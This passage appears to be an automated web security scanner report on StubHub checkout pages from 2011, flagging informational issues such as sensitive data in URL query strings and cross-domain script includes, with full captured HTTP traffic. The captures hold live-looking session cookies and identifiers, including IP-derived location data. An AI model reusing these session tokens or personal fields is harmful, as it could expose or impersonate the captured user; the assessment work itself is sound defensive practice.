
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CDDE81CC39C11039023392EDD8A51875; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
com-stubhub-dye: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<link type="text/css" rel="stylesheet" href="${domainProcess.StaticDomainUrlWithRequestProtocol}/resources/mojito/css/pattern/phoenix-RC.css"/> --><link href="https://cache1.stubhubstatic.com/resources/mojito/css/common/stubhub.bundle.201012030145.min.css" rel="stylesheet" type="text/css"/><!-- the "noscript" css will be removed by javascript --><link href="https://cache1.stubhubstatic.com/resources/mojito/css/common/noscript-RC.css" id="noscriptCssLink" rel="stylesheet" type="text/css"/><link href="https://cache1.stubhubstatic.com/resources/mojito/css/feature/checkout-1.0.css" rel="stylesheet" type="text/css"/><link href="https://cache1.stubhubstatic.com/resources/mojito/css/feature/signin-1.0.css" rel="stylesheet" type="text/css"/></head>
...[SNIP]...
</noscript><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201007270631.min.js" type="text/javascript"></script>
...[SNIP]...
<div id="fanProtectPanel"><img src="https://cache1.stubhubstatic.com/resources/mojito/img/common/fanprotect_150.gif"/><div class="content xsmall" id="fpContent">
...[SNIP]...
</div><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201007290146.min.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-RC.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="https://cache1.stubhubstatic.com/resources/mojito/js/feature/checkout-1.0.js" type="text/javascript"></script>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/sf1stu_CheckOutMain_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

6.2. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:27 GMT
Server: Apache
Set-Cookie: TLTHID=D4150DD639C110390234E07390B95A9D; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<link type="text/css" rel="stylesheet" href="${domainProcess.StaticDomainUrlWithRequestProtocol}/resources/mojito/css/pattern/phoenix-RC.css"/> --><link href="https://cache1.stubhubstatic.com/resources/mojito/css/common/stubhub.bundle.201012030145.min.css" rel="stylesheet" type="text/css"/><!-- the "noscript" css will be removed by javascript --><link href="https://cache1.stubhubstatic.com/resources/mojito/css/common/noscript-RC.css" id="noscriptCssLink" rel="stylesheet" type="text/css"/><link href="https://cache1.stubhubstatic.com/resources/mojito/css/feature/checkout-1.0.css" rel="stylesheet" type="text/css"/></head>
...[SNIP]...
</noscript><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201007270631.min.js" type="text/javascript"></script>
...[SNIP]...
<div id="fanProtectPanel"><img src="https://cache1.stubhubstatic.com/resources/mojito/img/common/fanprotect_150.gif"/><div class="content xsmall" id="fpContent">
...[SNIP]...
<div class="verisign" id="verisign"><a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;type=GOLD&amp;sealid=1&amp;dn=WWW.STUBHUB.COM&amp;lang=en" onclick="window.open(this.href,'Verisign','height=450,width=550,location=yes,directories=no,toolbar=no,scrollbars=yes,menubar=no,resizable=yes');return false;" title="Verisign Security"><img alt="Verisign Security" border="0" src="https://cache1.stubhubstatic.com/promotions/scratch/common/verisign_sm.gif" style="padding: 5px 0px;"/></a>
...[SNIP]...
</div><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201007290146.min.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-RC.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="https://cache1.stubhubstatic.com/resources/mojito/js/feature/checkout-1.0.js" type="text/javascript"></script>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/sf1stu_CheckOutMain_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

7. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CDDE81CC39C11039023392EDD8A51875; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
com-stubhub-dye: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
</noscript><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201007270631.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="https://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201007290146.min.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-RC.js" type="text/javascript"></script><script src="https://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="https://cache1.stubhubstatic.com/resources/mojito/js/feature/checkout-1.0.js" type="text/javascript"></script>
...[SNIP]...

7.2. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:27 GMT
Server: Apache
Set-Cookie: TLTHID=D4150DD639C110390234E07390B95A9D; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
